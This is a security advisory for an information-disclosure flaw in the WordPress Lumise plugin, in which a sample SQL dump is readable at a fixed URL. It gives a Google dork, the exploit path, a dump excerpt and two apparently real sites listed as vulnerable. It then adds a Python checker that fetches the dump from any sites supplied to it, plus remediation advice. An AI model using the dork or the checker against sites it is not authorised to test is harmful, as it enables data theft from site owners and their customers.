WordPress Lumise 4.9 Database Disclosure

2018.12.18
Risk: Medium
Local: No
Remote: Yes
CVE: N/A

#################################################################################################
# Exploit Title : WordPress Lumise Plugins 4.9 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 17/12/2018
# Vendor Homepage : wordpress.org ~ sequelpro.com ~ lumise.com + codecanyon.net/category/wordpress?tags=lumise
# Software Download Link : codecanyon.net/item/lumise-product-designer-woocommerce-wordpress/21222684
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : WordPress 4.7.x - 4.9.x + Compatible With : WooCommerce 3.0.x - 3.2.x
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/lumise/woo/'' + intext:''Projetado por "Agência de Publicidade"''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
#                      CWE-200 - [ Information Exposure ]
#                      CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]
#                      (CWE-23 - Relative Path Traversal - was also listed in the original advisory, but no path
#                      manipulation is involved: the dump is a static file shipped at a fixed path inside the plugin.)
#################################################################################################
# Admin Panel Login Path : /wp-login.php
# Exploit : /wp-content/plugins/lumise/woo/sample/database.txt
#################################################################################################
# Example SQL Dump - Some Information and SQL Table Dumps =>
# ************************************************************
# Sequel Pro SQL dump
# Version 4541
#
# sequelpro.com/
# github.com/sequelpro/sequelpro
#
# Host: 127.0.0.1 (MySQL 5.7.18)
# Database: lumise
# ************************************************************
# Dump of table lumise_bugs
# Dump of table lumise_categories
# Dump of table lumise_categories_reference
# Dump of table lumise_cliparts
# Dump of table lumise_designs
# Dump of table lumise_fonts
# Dump of table lumise_guests
# Dump of table lumise_languages
# Dump of table lumise_order_products
# Dump of table lumise_orders
# Dump of table lumise_printings
# Dump of table lumise_products
# Dump of table lumise_settings
# Dump of table lumise_shapes
# Dump of table lumise_shares
# Dump of table lumise_tags
# Dump of table lumise_tags_reference
# Dump of table lumise_templates
# Dumping data for table `lumise_products`
# Dumping data for table `lumise_shapes`
# Dumping data for table `lumise_settings`
INSERT INTO `lumise_products` (`id`, `name`, `price`, `product`, `thumbnail`, `thumbnail_url`, `template`, `description`, `stages`, `color`, `change_color`, `attributes`, `printings`, `active`, `created`, `updated`, `order`, `size`, `orientation`) VALUES
INSERT INTO `lumise_settings` (`id`, `key`, `value`, `created`, `updated`) VALUES
#################################################################################################
# Example Vulnerable Sites =>
[+] mvmprint.bg/wp-content/plugins/lumise/woo/sample/database.txt
[+] criefacil.com/wp-content/plugins/lumise/woo/sample/database.txt
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
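The issue above is a plain unauthenticated GET of a Sequel Pro SQL dump that the plugin ships at a fixed path. The following checker is an added example, not part of KingSkrupellos' advisory or of the Lumise plugin: it builds the dump URL for a site, fetches it, and decides whether the response really is the exposed dump rather than a soft-404 or login page. The fingerprints (the "Sequel Pro SQL dump" header and the `lumise_*` table names) are taken from the excerpt quoted in the advisory; the sample response bodies in the block are constructed for the test, and the function names are this example's own.

```python
"""Offline-testable checker for the Lumise sample-dump disclosure (added example)."""
import re
import sys
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit, urlunsplit

# Path quoted in the advisory, relative to the WordPress root.
DUMP_PATH = "wp-content/plugins/lumise/woo/sample/database.txt"

# Fingerprints lifted from the dump excerpt in the advisory.
SEQUEL_PRO_HEADER = re.compile(r"^#\s*Sequel Pro SQL dump", re.MULTILINE)
LUMISE_TABLE = re.compile(
    r"(?:Dump of table|Dumping data for table|INSERT INTO)\s+`?lumise_\w+`?"
)
TABLE_NAME = re.compile(r"Dump of table `?(lumise_\w+)`?")


def dump_url(site: str) -> str:
    """Return the dump URL for a site root; a bare hostname gets https://."""
    if "://" not in site:
        site = "https://" + site
    parts = urlsplit(site)
    base = urlunsplit(
        (parts.scheme, parts.netloc, parts.path.rstrip("/") + "/", "", "")
    )
    return urljoin(base, DUMP_PATH)


def classify(status: int, content_type: str, body: str) -> str:
    """Classify a response as 'exposed', 'inconclusive' or 'not_exposed'.

    Only a 200 carrying the Sequel Pro header plus lumise_* tables counts as
    exposed; HTML bodies are treated as soft-404 / login pages.
    """
    if status != 200:
        return "not_exposed"
    if "text/html" in content_type.lower() or "<html" in body[:2048].lower():
        return "not_exposed"
    if SEQUEL_PRO_HEADER.search(body) and LUMISE_TABLE.search(body):
        return "exposed"
    if LUMISE_TABLE.search(body) or "INSERT INTO" in body:
        return "inconclusive"  # some SQL came back, but not the dump described
    return "not_exposed"


def extract_tables(body: str) -> list:
    """List the lumise_* tables named in a dump body (sorted, de-duplicated)."""
    return sorted(set(TABLE_NAME.findall(body)))


def check_site(site: str, timeout: float = 10.0) -> str:
    """Fetch the dump URL for a site and classify the response (network access)."""
    req = urllib.request.Request(
        dump_url(site), headers={"User-Agent": "lumise-dump-check/1.0"}
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read(65536).decode("utf-8", "replace")  # header is at the top
            return classify(resp.status, resp.headers.get("Content-Type", ""), body)
    except urllib.error.HTTPError as err:
        return classify(err.code, err.headers.get("Content-Type", ""), "")


# Constructed sample responses (not real site data), used by the tests below.
SAMPLE_EXPOSED = """# ************************************************************
# Sequel Pro SQL dump
# Version 4541
#
# Host: 127.0.0.1 (MySQL 5.7.18)
# Database: lumise
# ************************************************************

# Dump of table lumise_products
# ------------------------------------------------------------
DROP TABLE IF EXISTS `lumise_products`;

# Dump of table lumise_settings
# ------------------------------------------------------------
INSERT INTO `lumise_settings` (`id`, `key`, `value`, `created`, `updated`) VALUES (1,'version','1.0','2018-01-01','2018-01-01');
"""
SAMPLE_SOFT404 = "<!DOCTYPE html><html><head><title>Page not found</title></head><body>404</body></html>"

if __name__ == "__main__":
    for target in sys.argv[1:]:
        print(target, check_site(target))
```

`classify` is deliberately conservative: a 200 with HTML, or a 200 with unrelated SQL, is not reported as exposed, because WordPress sites commonly answer unknown paths with a themed 404 and status 200. On the defensive side the fix is equally simple: delete `woo/sample/database.txt` from the deployed plugin directory (or deny it in the web server config); a sample dump produced from a developer's local database has no business being readable by anonymous clients.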


Copyright 2019, cxsecurity.com

 
